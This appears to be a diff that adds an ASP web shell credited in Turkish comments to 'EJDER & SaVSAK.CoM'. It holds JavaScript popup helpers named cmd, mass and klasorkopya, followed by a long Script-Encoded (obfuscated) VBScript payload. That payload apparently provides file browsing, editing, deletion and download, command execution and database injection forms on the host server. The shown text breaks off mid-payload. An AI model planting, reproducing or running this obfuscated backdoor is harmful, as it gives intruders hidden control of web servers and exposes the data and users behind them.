+<!--TÜM HAKLARI SAKLIDIR.. KODLARDA yapacaðýnmýz bir deðiþiklik KODun Çalýþmamasýna mal olur. Bundan dolayý Bir sorun çýkarsa EJDER & SaVSAK.CoM Sorunlu deðildir..-->
+<!--Bu yazýlýmda geliþtilmiþ tüm herþey , mantýk, algoritma, yazýlýmlar Sýfýrdan Ejder tarafýndan yazýlmýþtýr. TEMA , düzen vede Görünüm Fastboy a Aittir. -->
+<!-- TAKLÝTLEÝRNDEN KAÇININ. by EJDER-->
+
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function klasorkopya(yol){
+        NewWindow(yol,"",400,130,"no");
+    }
+    function mass(yol){
+        NewWindow(yol,"",555,600,"yes");
+    }
+    function tester(yol){
+        NewWindow(yol,"",600,600,"yes");
+    }  
+    function klasor(yol){
+        NewWindow(yol,"",420,450,"yes");
+    }    
+    function cmd(yol){
+        NewWindow(yol,"",550,555,"no");
+    }
+    function biz(yol){
+        NewWindow(yol,"",550,700,"no");
+    }  
+    function cmdhelp(yol){
+        NewWindow(yol,"",500,230,"no");
+    }   
+    function somur(yol){
+        NewWindow(yol,"",420,220,"yes");
+    }       
+</script>
+<script language="JavaScript">
+function openInMainWin(winLocation){
+	window.opener.location.href = winLocation
+	window.opener.focus();
+}
+</script>
+<%#@~^ZFwCAA==@#@&/;(PnVlkWM63!@#@&dKx~nMDWM~D/Esn~x6D@#@&P~~,?nY,WP{Poj}RMnOwWsN.vsG^NDnmY4b@#@&P~P,?nO,0m,xP6R?!8oW^NDd@#@&~,P~sK.PAl^4,0F~(	PWm@#@&id7Eq6Pq	/D.`6F 1m:nS,JmKhRDDJ*~@*P8PKD~P(UkY.`6qRglhnBPJLG7RODrb,@*~8PKDP,q	dYM`WFc1Ch~Pr^WsYDrb~@*,F,PGD~~&xdYMc08RHCs+~~ETW-YME*P@*,F,PWMP,(xkY.`6F Hm:+B~JTW\|O.J*P@*PqP~GMP~q	dYM`Wqc1lhnBPEmKh|Y.r#,@*P8P,GD,P(xkY.c6FRgC:~PrdC\kl0mG:Eb,@*~F,~WMP~(	/Y.c6F 1mh~~r/m\/m3|^WsJbP@*Pq~,WD,~q	/YMcWFc1m:n~~Ekl-/mVR1WhE*P@*~q,K4+	@#@&d7idE?+DPDn6D?ODlh6(L+1OP{P0kG ra+	Kn6OobVn`w;V^wCO4~ SOMEn~6C^/n*P@#@&didivY6O?DDnCsr4NnmDRMrO+dk	+cNVCHkO *@#@&id77EY+aOUY.+mh}4%mDRZ^WknxDn@#@&d77iB?OPD+6DjODlsr8Ln^DPxPgGY4kUL,@#@&77idvDdaWUk+c+x9`*@#@&id7Bx[~b0@#@&~P,PdbW~sKV9+.nCO4PxPr^)rPG.,sWs[DKlD4,'~rZ=JPDtU@#@&P~P,P~~,I+k2W	/+c	.kD+,J@!YC8^+~m^C/k'EE04DOhrJ~@*@!OM@*@!DN@*@!0KxD~m^ld/{JEV8JJ@*@!l,YkDsn'rJ,fryrUbPFWazl^l~',Klþý~ErP4DW{BELsbV+hlD4[rghW9+x+L3W	;:{J[wGsNDhlOt'Er[WFcHls+'ELKkhn{J'Ybh[EEPKxm^k1V'rJVVm/G.0WwHC`Dtkk 4D0*i.+O;Mx~0ms/iEE@*c@!&C@*@!&0KUD@*~@!0KxY,m^C/k'EJ0FEE@*@!l,~YbYVxEJ,fbyrxr~UksPrEP4DnW{BJ'obVnnmO4[EQ:KN+{cLVW	Eh'r[oG^N+MKlDt[r'[+^'r[oWs[DKlD4[rJ'W8R1Ch[E[:rs+xr[Dk:[rv@*û@!zC@*,F@!&6WxD@*@!6WxD~dk.+{ @*@!8@*@!l~YbOV'EE,fk"r	kUPbçr	+~VkMPJrP4.+6'vJLsrsnlD4[rg3KU;:{JLsGV[nMnCY4'Jr[Wqc1lhnLJ'Kbh'ELYb:+LJE@*JL0qR	lhnLJ@!JC@*@!z4@*@!&Y9@*@!zOD@*@!JYC4^n@*rP~~,PP~7@#@&~P,~i+sk+@#@&P,P,~P,P]+kwGUk+Rq.kD+Pr@!Ol(VP^VCdk'EJ08DD:EE,@*@!O.@*@!ON@*@!6WUDP1Vlk/{EJ0FEJ@*@!C~DkY^n'rJPGr"k	k,|GwzC^l~[,Plþý,JE~4D+WxEJ'sbsnCDtLJgsW9n'y[VW	Ehxr[sKsNDnmO4[r-r[WF Hm:n[r'Kb:nxr[Yrh[EB,G	msbm0'Jr3^C/KDVWaXCcDtkk tM+0*I.+DEMx~0Csk+IJr@*c@!zC@*@!z0GUD@*~@!6G	Y~1Vm//{JrVFrJ@*@!mP~ObYVxJrPfb"rxbPUksPEE,t.+6xBr[or^+nCO4[EgsG9+xW[0Wx!:{E[wWsNDKCDt[r'NV'r'oW^NDKlO4LJwJLWFc1Ch[J'Pb:n'r'Dkh[rB@*û@!zm@*P8@!&0KxO@*@!0W	OPkkyx+@*@!4@*@!CPOrDVn'rEPGk"r	kx~rçbxnPVrMPErP4D+6'EE[wks+hlO4LJg0Gx!:'r'oW^NDKlO4LJwJLWFc1Ch[J'Pb:n'r'Dkh[rB@*r[6qR	lh+LJ@!&m@*@!J8@*@!zY9@*@!zDD@*@!&YC8^+@*J,~P@#@&~~,PP~~,+UN,r6@#@&,P,PP,P,]+kwGxk+ o^E/4@#@&,PP,Hn6D@#@&P~P~^mVsP4CYm@#@&n	NPd;(@#@&@#@&d!4~GWkXl}3!@#@&iWUPD.GMPDdEs+P	naY@#@&,P~PjnDPWP{~sUr !YsGs9+.`wG^NnMnmYt*@#@&~P,Pj+DPW^,'P6 sbV+k@#@&P,P,sGD~3mm4P6qP&x~W1@#@&~~,P~P,~9WdHlzNk,',WFcxC:@#@&~,PP,~P,xEs~xP&xUY.In-vNG/HCb9kSEcJ#@#@&,P~P,~,P;.l	Yk,',smm/n`"kL4D`NKdXmbNbSs+	`9WdXC)9kbO	;:*#@#@&,PP~~,P~NKA	?OMP{PJ@!l,OkDVn'rJ9GkXlHý~?bVJr~4D0{BE[or^+KlD4[rghG9+'X'0WUEsxr[oKV9+DhlD4[r[[+^'E'wWV9nDhlY4'E-r[6F 1Ch[E[:r:'E'Dk:n'rB@*û@!JC@*@!WKxDP0mmxh4[k	od@*@!lPDrY^+'rE~fKh	VGl[~Y~Jr~tM+WxEJ[or^+KlD4LJ_sW9+'+[6rV'E[6F 2mYtLE[0Wx!hxJLsKV[+.KmY4[r'Kb:nxr[Yrh[EB@*Í@!Jl@*@!z6WxD@*@!WW	Y~0mmnxSkxT[k	o/@*@!CPDkDVn'EE,fG/HCXý,|G2HlVC~LPPlþý,ErP4M+6'Br[wrVnCY4[E_sWNxGL0k^nxJL08R2lO4LJ'Kbh+{J'Ob:+'EEPGx1sbmV{Jr3Vm/K.3KwzlvY4rkRtMn0*iDO;D	P6ls/nIrJ@*c@!&l@*@!C~DkYsn{JEPGGkXC,b9P[,sK.:mY~fðkþOrMPJr~tM+0{vE[wk^+KlO4LJ_:K[+{F'6kVnxr[WFc2mY4LJLk/^+sxJL0qR	lhnLJ[0Gx!:'r'oW^NDKlO4LJ'Kbh+{J'Ob:+'EEPGx1sbmV{Jr3Vm/K.3KwzlvY4rkRtMn0*iDO;D	P6ls/nIrJ@*g@!&l@*@!&WKxY@*E@#@&~P,~,P~,D/wKxknRqDrYPE@!Dl4^nP1VlkdxJr3(DO:EE,@*@!YM@*@!DN@*@!6WxO~kk"+{+@*J@#@&P,PP,P,~/VnmDP^Ck+P!"l	Yk@#@&~P,P,P~P^Ck+~Js[4r@#@&~,PP~~,P~P,~"+daW	/+cMrYPE@!mPOrDV+{EJ,f4,rUPbçk	k~Mö.h3~~,jp^PdGMoE~zmwhl0~bçkU,Ký0Vl,4H~2xf3I,ib~rJP4.+6'Br'ok^+hlOt'EQ:GNxF2[Wr^+'E'wWsN.hlO4[r-JL08 1m:n[r[VG	E:{E[wWV9n.nmY4[E[Prs+xJLOks+'EE@*J'W8RUlsnLJ~]@!6WxDP1GVKDxXVsGS@*JLoWM:lDH;:(+M`WF dbyn~Zb[r@!&WKxY@*Dr[E@!JC@*@!&(@*,@!0KxD~0mmn'SkUL9kxTdPkkyx*@*tP r[[WAUUY.[r@!z6WUO@*@!zO[@*@!&YM@*@!zOm4^+@*r@#@&~P,P~P,P^Ck+PrC/aJ@#@&~~P,P,P~P~~,In/aGxk+ 	MkYn~r@!CPDrDVn{JrPÝçk	k,!öDü	Yüs+s+V~bçkx,Pý3^lPrE~tM+6'vJ'obVnnmOtLJ_hKN+x1L0rVxr[oKV9+DhlD4[r-E[6F Hm:+LE[0Wx!hxJLsKV[+.KmY4[r'Kb:nxr[Yrh[EB@*EL0qcxm:+LJ,,@!6WUY,mGsKD'HnV^Wh@*E'sKDslO1;h(+.`6qRkk"nB!#'E@!zWW	O@*TELJ@!zl@*@!J8@*,@!WW	Y~Wmm+{Ak	oNbUL/,/byn'*@*±,@!CPDrY^+xErPfGdHlzýPA[bYs:3Pbçk	~Ký0VCP(X~3xf2"~)*PJr~4D0{BE[or^+KlD4[rghG9+'qTL0rVxr[W8RalY4[r'Kb:n'r[Ors+[r'3KxEsxE[wW^NnDKCDt'JE@*"@!zC@*r[NGA	?ODLE@!zWKxD@*@!JY9@*@!JY.@*@!zOC(V+@*E@#@&PP,~~P,P1ld+~ENwLJBEob0E@#@&PP~~,P~P,~,P]/aWxk+c	DbYnPr@!C~DkY^n'rJP"nd:bPVöDh+V~bçkUP:ýVVmPEE,tDnW{BE[wr^+KmY4[JQ:K[+{F+[6ksn{J[wGV9+DhCOtLJ'J'0q glh+LE[0WU;s'J'oKV[+MKmY4LJLKks+{E[Dkh+LJv@*r[08 xm:+LE~$@!0KxOP^G^W.'HnV^WA@*r[sG.slO1!h(+.v08R/byS!*[E@!J0GUD@*Tr'J@!zl@*@!&4@*P@!0GxO~6l^+{A+(NrUT/Pdr.+xc@*¢@!J0G	Y@*@!0KxD~0mmn'SkUL9kxTdPkkyx*@*, JLNGhUjDD'J@!&0KxO@*@!zY[@*@!zOD@*@!JYC(V@*J@#@&,~P,P~P,mCdP+^d+@#@&P,~~P,P,P~P~]/2W	d+c.rD+PE@!mPOkDs'ErPÝçbxk,MöMüUYü^+h+0Prçr	PKý0sl,JJ,4.+6'EJ'srsnCY4'JQ:G[','WbVn'r'wWs9+MnlDtLE-r[WFc1Ch[JLVW	E:{E'sKV9+.nCO4[E[:r:'E'Dk:n'rB@*JLW8RUm:[J,$@!WW	Y~mKVG.{X+^sWS@*JLoGDslD1;:8nM`WFcdk.+ST*[J@!&6WUY@*Dr[E@!zm@*@!J4@*~@!6WUY,0C^'hbUo9kxTd~/by'*@*+~@!l~YbOV'EE,fWdzmXý~29rDVns+0Pkçbx,Pý3^l~4HP3BG2I,l#,JJ,4.+6'EJ'NGdHlKlD4[rghG9+'qTL0rVxr[W8RalY4[r'Kb:n'r[Ors+[r'3KxEsxE[wW^NnDKCDt'JE@*"@!zC@*r[NGA	?ODLE@!zWKxD@*@!JY9@*@!JY.@*@!zOC(V+@*E@#@&PP,~~P,Px[Pdn^+^Y@#@&P,P~H6Y@#@&,P~P1C^V~4lDl@#@&+	[PkE8@#@&@#@&d!4PU;D!mE^n.@#@&d6W.PnC1t~NMr\{~r	Psj6cf.k7nk@#@&id"+/aW	d+c.kD+~E@!YD,8o1WVK.xJra2lflfCrJ@*@!D[P4+rL4Y'EEy!EJ,^^ldk'rJ3(DDhJr@*E@#@&d7]/wKU/RMrO+,J@!l~t.n6'EJ,E[wksnhlY4'rgVW	;s'ELNMk\{c9Db\nSYOnM[J=&PrJ@*r@#@&dik6P[Dr-{ fMr\Yz2'F~O4+UP"nkwG	/RhMkDnPr[U4kwI'	4/aI@!6WxD~^Vm/k'EJVqrJ@*@!@!&0KxO@*Lx4d2pfr/0nDPjüMümü,$J,[,[Db\n{cf.r7+SOYDPL~E)Y[	4dwI'	4dwp'x(/2I@!lPOrDVn'rEUüDü^ü,fYlHýPÝçbUP:ý3slrJ~4M+0{EJr[sbsnnmY4[Eg[dal^+{E[9Dr-{R9.b\nSOD+.LJL3W	EsxJL3Gx!:'ErJ@*@!WW	YP1sC/k'rJVFEE@*Ä@!&0KUY@*@!&C@*J@#@&7ikWP9.b\n|RGDk7+Dzw'+PDtnU,I+k2W	/+cA.kD+,J'x8dai'x(dwp@!WG	YP^sm/d'rE0FEr@*p@!z6W	O@*Lx8/aijC(kY,9kk3P]E~[,NMk-+m GDr\J+DYn.,[PElY[U4k2p[U(/ai[	4k2i@!l~YbYsn{JJUü.ümü,f+DCzýPÝçbx,KýVVCErP4DW'rJE'wkVnKmY4[r_9/2mm'JLNMr\{ fMk-nd+YDnDLJ[0GUEs'r[VWU;s[EJr@*@!6WUO,mVCdk'EJ0qrJ@*Ä@!z6WxD@*@!&l@*J@#@&idrW,NDb-+|RfMr-+DXa+x&~O4+UP"n/aWUdRh.rD+~JLU(/2p[	4/ai@!WW	Y~m^ldd{JJ0qJr@*i@!&WW	Y@*[U4d2pÇý3CDý^C4bVr.,fkdV,$EPL~9Dr7+|RfMk7nSYO+MP'~r)TLU4kwiLU8/aiLx8/2I@!l~YbOV'EEUüDümü~9YCXý,Ýçr	PPý0VmJJ,tMn0{JEJLsrsnlD4[rgNk2Cm'r[[Dr-{ fMr\SnOD+D'EL3Gx!h{J'0W	E:LJrE@*@!0GxDP^sm//{EJ0FJr@*Ä@!z6W	Y@*@!&C@*J@#@&i7k6P[.b\+m GDr\OHwn{c,Ytx,]+kwGxk+ AMkY~JLx4k2I[	4kwI@!WG	Y~m^C/k'EE0 JE@*³@!zWW	O@*[U(/aiZ9O"G:,$EPLP[.b\+| fMk\JnYD+MP'PElY[U4k2iLx8dai[U8kwI@!m~DkO^+{JJUüDü1ü~fYCXý,ÝçkU~:ý3VmEJ,tDWxJrJLsrVnKmY4[r_NkwC^'J'[Mk-+| GDr7+d+YD+M'JL3Gx!:xEL3W	;:LJJr@*@!0KxDP^VCdk'EJ0qJr@*Ä@!&6WxO@*@!zC@*r@#@&d7"+kwW	/ MkO+,J@!&m@*@!JON@*@!zD.@*J@#@&ixn6O@#@&d7IdwKxdncDrOPE@!D.,4L1W^WD{Jr:&m&C&mJE@*@!YN,^Vm//{EE3(DD:EJ~4kLtDxJr TEr@*[U8kwI[	8kwI@!l,tD0{EJ,J'sbVnKmYtLEPrJ@*@!WGxDP1VC/dxrJV rE@*_@!&WKxY@*~dW^l^~hlO4P@!zl@*@!JON@*@!&YM@*E@#@&+x9~/!4@#@&@#@&?!4,?;D;^!qU0K@#@&iB9rk3P)smxýUýPVödD+.bD,OP;DCYN~AHPoCkKAKePp#@#@&7@#@&ifMk-+j2mmnP{~I;;nkY`E[kwCmE*@#@&iq6P1KY,9Db\n?al^n,'PrEP:t+	@#@&dKx,+.DG.,Dn/!h+,xnaD@#@&7jY~NMr7+6(LmY,',o?}R!+Df.r7+`G.k7+?aC^+*@#@&d9F~x,Sn0Dc`9Dr-r4%n1Y sMn?2mmz`9Db-+}4%+1Y PKYl^jk.+e8 T#*e8!TRTS,cb@#@&7k6Pn.MP@!@*~ZPOtU@#@&7M+kwW	/ hMkO+,J@!^xY.@*@!4D@*~@!0KxDP^WsGM':sA{bRc@*~@!0WUO,0CmxqkUTNbxokPkry'X@*g@!&WKxY@*~fb/3,uCyýMP9+ðrV~~e"Z",l`,@!WG	YPWC1+xbUTNr	okP/byx*@*1@!z6WUO@*@!z6GxD@*P@!8.@*@!z1+UYn.@*J@#@&inVk+@#@&if ~x,Sn0Dcv`[Mk7+r(L^YcKGYmVjr.+P ~NMk\68LmDRoDnnUwCmbzvN.r7+r8%mOR:GDlsUk.+e8RZb#CFT!c!S~W#@#@&7f2P',qT!@#@&ifql~x,Fq!,RPGF@#@&if C~{PqFZ~ P9y@#@&df2l,xP8FTP P9f@#@&d"n/aWxkn MkD+~J@!8M@*@!mUYD@*@!Dl4sn,mnV^dal^bxT'!,msVal[NbxLxZ@*@!D.@*@!YN,dOX^+{B8l^VTDGE	[O1WsGM)P:qyF+FyIEP^KVkwl	'W~l^kLx{mnUD+D,^Vm//{V8DD:@*@!8@*9rk3~)@!&4@*[U8kwiE~LP[Db-r8N+1YRGDb-+d+OYD~',J@!JON@*@!zD.@*@!DD@*@!ON~^^ld/{V4MYh~SkNO4{vT@*LU(/2p@!JYN@*@!D[P1VC/k'V8MY:,Ak9Yt{qT!,l^kLxx^xO+M@*@!(@*$Gþ,bVCU@!z8@*@!&DN@*@!Y9Pm^lkd'04.YsPAr9Yt{q!ZPl^rLx{mxO+.@*@!4@*|!sVmxýsC	PbsC	@!&4@*@!JY[@*@!DNP1Vmd/{38DD:~AbNY4xFZ!Pmsro	'1+UYn.@*@!8@*:Gw^lh~zVlU@!J4@*@!JO9@*@!JYM@*@!DD@*@!Y9P4+bo4O{FFZ~m^l/kxV4MYs@*'x8dai@!zD[@*@!Y[~1Vldd{38DDh,lsbo	'mxDnD@*@!Ol(Vn~1+V^2l9Nk	Lx!,mVs/2C1kUo{T@*@!Y.@*@!YN~^KVdwmU{&~4+botD'r'f8l'J@*@!&O9@*@!JOD@*@!YM~4+bo4YxJ'98[E@*@!ON,4L^KVW.x[!T,OTZPAbNDt'y@*@!&Y9@*@!Y9P8L1WVK.'[&&;/T!,hbNOtxql@*@!zD[@*@!Y[~(omGsKDxaZTO,TZPSkNDt{+@*@!zON@*@!&OM@*@!JOl(V+@*@!&Y9@*@!Y[P^sm/d'08DD:~C^koUx1+UY.,\C^kTx'(WDOWs@*@!Ym4sn,m+^swmNNbUL'ZP1+sVd2mmrxTx!@*@!O.@*@!Y[~1Ws/aC	'f,tko4Y{E[G C[r@*@!&DN@*@!&YM@*@!D.~tkTtO'E'G 'J@*@!Y9P8L1WVG.{a1,ZTZ!~Sk9Yt{ @*@!zDN@*@!DN~8TmW^GD{aZ;TT!ZPSk[Y4x8*@*@!JON@*@!O[,4o^G^W.'[1O!TZ!,hk9Y4x @*@!&Y9@*@!&DD@*@!&Ym4V@*@!zDN@*@!ON~^^ld/{V4MYh~mVkLU{mnxDnMP-mVbox{4KOYK:@*@!Dl8sPmsValN9rUo{!,mnVsdal^k	L'Z@*@!OM@*@!O[,mGVk2mxx2P4+kTtDxJLfflLJ@*@!JYN@*@!zDD@*@!O.P4+bo4YxELff[r@*@!DN~8TmWsGM':!Z+,1,hbNY4'y@*@!JY[@*@!Y[~(omKsWM'aZT0%;Z,hrNO4{FX@*@!&Y9@*@!O9P4L^KVGD{:Z!+,OPhbND4'y@*@!zDN@*@!JYD@*@!zDl4^n@*@!JY9@*@!zO.@*@!OD@*@!Y9P^sm//xV(DO:@*'	4dai@!4@*Iüy9nP=@!&4@*@!&O9@*@!D[P1Vlkdx3(DD:~lsrTxxmUYD@*ELfF'E,]@!zD[@*@!O9P1Vlk/{V4MYhPmVrL	'mUYD@*r'9 LJ,]@!zO[@*@!ON,^Vm/dx04DOh,lskTU{mn	YD@*r[Gf[rPY@!JY[@*@!zYM@*@!DD@*@!O[P1Vm/d'V8MYh@*LU4kwI@!(@*AGz!Y~)@!&(@*@!JY9@*@!DN,^Vm/d'04.OsPl^ro	'mUO+M@*Lx8/2IrP'PwGDslOH!:4n.vN.k7n}4%mDRsM+jwmmnPJPqTW%*F#,[Pr~\A@!zDN@*@!O[,mslkd'04.OsPlsrTxxmUD+.@*[	4/air~[,sGDslOH!:4.`9Dk7n64N+1Y KGOmVjk.nPJPqTW%*{*PRPwGM:CD1!:4Dv[Db\nr(Ln^DRsMn+Uwl1n~z,FZc0*{*P'Pr~H~@!&O9@*@!O[,mslkd{38MYsPl^kTU'1+UYD@*'	4/aIJ,[PwG.:mYgEh4n.vN.k7nr(Ln^DRKGOmVjk.n,z~8!W%*Fv*~[,J~H~@!&O9@*@!JOD@*@!zDC8V@*@!z^+UOD@*@!(.@*@!4.@*@!4D@*E@#@&7+	[,kW@#@&i?+DP9.k7+64N+^O,'PgGY4kxT@#@&dAx9P(0@#@&x[Pk;4@#@&@#@&kE4~zYVk	Gv/OM#@#@&D/aGxk+ hMkOn,J@!D[P1VlkdxJr3(DO:EE@*[U4k2iLx8dai[U8kwI@!(@*@!0G	Y,mW^WMxawA3FGG@*EL/YM'J,)@!JWGxD@*@!z8@*~@!6WUY,^W^W.x[s2{)Rc~m^Ck/xrJ0FJr@*û@!&0KxO@*Lx8dai[	8/ai[	8dwp@!JY[@*E7@#@&3x9~?!4@#@&kE4~zYVkHnk`dDD*@#@&M+k2W	/nRSDrOPJ@!ON,mVmdd'rJ04.YhEr@*'x(dwp[U8kwi'U(/2i@!8@*@!WKxDPmKVK.'[s)sAf3@*r[/D.[rP)@!&WW	Y@*@!&4@*~@!0GxD~mKVG.{aZo;A3P1sm/d{Jr3FrJ@*ü@!z6WUY@*[U8kwiLU4kwiLU8/ai@!zON@*E@#@&nx9~?!4@#@&@#@&/;8,5nY0r@#@&7Kx,+DMWM~D/;:PUnXY@#@&~P,P?O~0,',sjr !YoW^[+M`oG^N+.KmY4#@#@&,P~,k6P+MD@!@*!,Y4+	@#@&7H+Y0rxK`J}V;:mJ*@#@&dznD3rxKcJIl"hmJ#@#@&iXnY0r	Wcr?bV:J*@#@&,P~PVdn@#@&dHnY0kXdcJ}3!:CJb@#@&@#@&P,~PKx~nMDW.~M+dEsn,xnXY@#@&P,P,j+DP\Xwksn,'PwjrcZDCO+:+XYoksnvsGV9nDhlO4,[PEO/OR%9+.r~,KD!+*@#@&,P~PtXor^+RS.kD+Pr3%ND,C/~uDnRc P{#~emy:C~ P63!hmPP/DkPbçk	E@#@&P~P,/nO,HXwrVP',HGY4k	o@#@&~~,Pr0,nDM@!@*T,YtnU@#@&7XO0kUK`r5l.:mE#@#@&7XYVr	W`rjk^:+rb@#@&,P,PnVdn@#@&7XO3bXndvJ5C"slE#@#@&,P~,P,PPKx,nDMW.PM+d;s+P	n6D@#@&,~~P,P,Po?6 G+s+DnsbVn~wWV[nMnCY4~LPED+kYRL9nDr~OD!+@#@&,PP,~P,Pk6~nDM@!@*!~Y4n	@#@&diz+D3rUK`Jjr^:nJ*@#@&P~,P,PP,+^d+@#@&7dH+OVbX+kcJUkVsnE#@#@&,P~P~~,Pnx9~k6@#@&~,PPnU9Pr0@#@&@#@&~,P,+x9PbW@#@&P~P,/nO,0P{~xKYtbUL@#@&+	N~/;8@#@&@#@&U;4,WshmNkcdDDb@#@&./2Kxk+RSDbO+,J@!4M@*@!^xY.@*@!0W	O~mKVKDxao3Fb0c@*~@!6WUO,0l^n{rxT[bxLkPkky'l@*1@!zWW	Y@*~r[/D.[rP)v~@!0KxDPWl^n{rxT[k	od~kkynxl@*H@!JWKxO@*P@!z0KxD@*@!JmnxD+.@*r@#@&AUN,?E(@#@&@#@&?!4~Ws[!`dYMb@#@&DndaWxdnch.kDn,J@!(D@*@!mxDnD@*@!WW	Y~^KVWMxa;vs;$3@*,@!6WUY~Wmmn'qrxTNrUT/Pdr.+x*@*H@!zWKxD@*Pr[kODLJ~i*PPn(Dk0s+MRR,8zPAL9+.P@!WKxOP6Cm'	r	oNrUT/~/b"'X@*1@!z0KxD@*P@!zWW	Y@*@!Jm+	O+M@*J@#@&3x9PUE8@#@&@#@&?;4,Ol(VGqy`/O.*@#@&DdaWUk+chDbY~J@!Y.P(o^G^WD{EJ[F 8+q rJ@*@!ON~C^kLx{EJ1+UODJE~Sk[Y4xrJqZ!uJJ,P7CVboU'rJhr9NVEJ@*J[kO.[r@!JY[@*@!&DD@*J@#@&2	N~j!4@#@&@#@&?;4,Om4sK&Z`/DD*@#@&M+dwKxdnchDbO+,J@!D.~4TmKVGDxEraf!2T&ZJE@*@!YN~^^ld/{Er38MYsJJ,l^ro	'EJ1+UODJr~hbNY4xEJ8!Z]EJ~~7lskTU'rJhr9NVnEr@*E[kOM[E@!zDN@*@!zD.@*r@#@&2	N~j!4@#@&@#@&UE4,OC4^W8 J`dOM#@#@&Mn/aWUdRh.rD+~J@!OMP8TmKVWM'rEa8 q 8 EE@*@!Y9~l^ko	xEJ1+	YnDEE,hrND4'rJqTZ]JE~,\CVbL	'Er:bNN^+rE@*r[dYM[E@!JYN@*@!zDD@*r@#@&2	N,?;4@#@&@#@&jE(~Ym4sG8 rcdDDb@#@&./2Kxk+RSDbO+,J@!YMP8L1WVK.'rJa8+q 8 rJ@*@!O[,mslkd'rJV8MY:EE,lskTU{JE1+	Y+MJr~hbNOt{JEqZ!]rEP,\l^rLx{Jr:rN[sJE@*r'/DD'E@!zY[@*@!zOD@*E@#@&3	N,?E(@#@&@#@&kE8P_lOC@#@&P,~Pb0P..@!@*!,Y4+U@#@&P~P,~P,P]nkwWUdR	DbOPE@!mxYD@*@!0KxOP1WsGM'D[Pkkyx+@*_lDl~)~EL+.Dc9+km.raYkGULJ@!z6G	Y@*@!z1+xD+M@*J@#@&~P,PnU9Pk6@#@&xN,d;4@#@&@#@&oEU^DkGx,]+mN$r	lDzobVn`wr^+Hm:#@#@&P,/W	/OPmNPza+AbUlMXP{~q@#@&P,fr:~$bxCDHjYM+Ch@#@&P~jY~AbUmDzUYM+lsP{~ZM+CYr8%mYvEbGrf~ jYM+m:E#@#@&,P$k	CDH?O.l: PHwnP{~mNPHwAk	lMz@#@&P~AbxC.H?YMnlsRranU@#@&P,ArxC.H?ODC:cSGC9sDGhwks+,obVngls+@#@&P,]+mN$k	l.zwkV~',Ak	C.XUYM+C: ]l[@#@&3x9Po;	mYrG	@#@&@#@&j!4~Upd{:x!m4H{3L9+.@#@&dDdwKx/ ADbYPE@!^n	YnD@*@!Ym4sn,hk[O4'EJWXZJE@*J@#@&dM+k2W	/nRSDrOPJ@!OD,mVmdd'rJ04.YhErP-l^ro	'EEDWwEE@*@!ON,^KVdal	'Jr rEPmVro	'EE1+xDnDrJ@*r@#@&dM+kwGxdnch.kDnPr@!WGM:PUCs+xJr[K/zmmKwXalkO+rJ~l1YrG	'Br'sbV+hCOtLJEPOX2n{JEwKdYrJ@*E@#@&d.nkwGxknch.bYPJ@!Ym8VP^Vm/dxrJ3(.YsJJ,^nV^wmN[kUL{JEFrEP1+sskwl^r	oxJrqrJ~(o1WVKD{EJ[*[*9*[ErPhb[Y4'JrqT!uJr@*E@#@&7Dl8VKf!vJ~@!(@*?}J,Ýx%+1ObWU,HD3yb@!z(@*E#@#@&7Om4VKf!vJ[	8dwpJ*@#@&dOC(VGFycJ@!0GUDPmGsKDxaw3Fb0W@*,|E^VmUl(ks:xr",kçk	~?5SP0G;ýY^lMýP8kshxry,L+M+V~e""~@!(D@*P@!WKxO,0mm+{bUo9kUokPdr.+'l@*1@!z0KUO@*,b0/rPuC^NnPzjn,f6dHlýPFrDVnxb.cP/\mwP7+Mn:y PU+.-DPm~}mDlM~-+MkMR~P@!WKxOP6Cm'	r	oNrUT/~/b"'X@*1@!z0KxD@*@!J0GxD@*Eb@#@&dDC4^WFycEPU+^+^Y~@!bx2ED~\mV;n{JJdn^+^YrE,Yza+{JJMl9rWrJ~xm:nxrJkks+sJJ,^4+13N@*P@!r	w;Y,~/bynxrJvTErPOXan{JED+XYJrP	C:'EJbx%n1YFrEP7lV!nxBU+^+^Y~M,0.Ws~JLYC8^+[Ev@*Jb@#@&7Dl8^W8 `rPGnVYnP@!kU2!YP7CV!+'rE[+^+D+EJ~OHwn'rEDmNrGrJPUCs+xJrrkVnsJrP@*,@!bUw!Y~Pkk"n{JJ+TJrPYH2n'rJD+aYEE,xC:xJrkU%mY+ErP-l^;'vG+^+YP6.WsPE[Dl8s[JE@*J*@#@&iOC4^W8 cJ~(	/nDD~@!bx2;DP\Cs!+xJrr	/nMYrJPDXan'rJ.l9kGErPxmh+{JJbds+sJrP@*P@!r	w;Y,~/bynxrJvTErPOXan{JED+XYJrP	C:'EJbx%n1Y&rEP7lV!nxB&xk+.Y~r	YGPr'Ym4snLJPcb,\CV!nkPc*B@*J#@#@&iOl(VGFy`E~`wNmO+,@!k	2;Y,\mV;+xErE2NmO+rJ~OHw+xErDCNbGrJ~	ls+'rJbdV:EJ,@*~@!bxw!OP,/k.nxJrvZJEPOza+xJrO+XYEE,xlhn{JEk	%mOWJrP\mV!n'Ej2NmYn~r[Ym8V[J,dnY,RcPAtn.P RE@*J*@#@&7Dl4sG8 cJ,9bð+.,@!bxw!Y,-l^En'rJ[rT+DrEPDXwxEJMl9kGJE~	lh+{EJb/snsJJ~@*,@!rxa;DP~kk.+'rJ+TJrPOXa+xErY+XOJrPxmhn'rJbx%+^OlJEP7CV!+xvGDW2~r[Ol(s[EE@*r#@#@&dDC4^Wq vJ@!r	wED~xm:+{EE:KNJEPOza+xJr4k9NnUrJP-C^En'EqlB~@*@!bxw!Y,Uls+xJr/n^rJPDzw'Jr4rN9+	JEP-C^En'EE[k+^'rBP@*@!bx2ED~	lh'rJ+NN./$VEJ,Yz2'Jr4k9N+	EEP7l^En'vEL+%N./$V'EEP@*@!r	w;Y,Um:n{Jr0k^+rEPDX2+{JE4bNNUJrP\ms;+{Br[WksnLJvP@*@!k	w;O,xlhn{JE3KU!:ErPDXw'rEtbN[+	JE~7lV!n'EJ[wGsNDhlOt'EEP@*@!bUw!Y~Um:+xErYC4^nrJ~DXa+'rJ4rN9+UJrP-C^E+{vJLYl(sn[rB,@*@!4.@*@!kUw!OP7ls;'JE~UpJPÝ	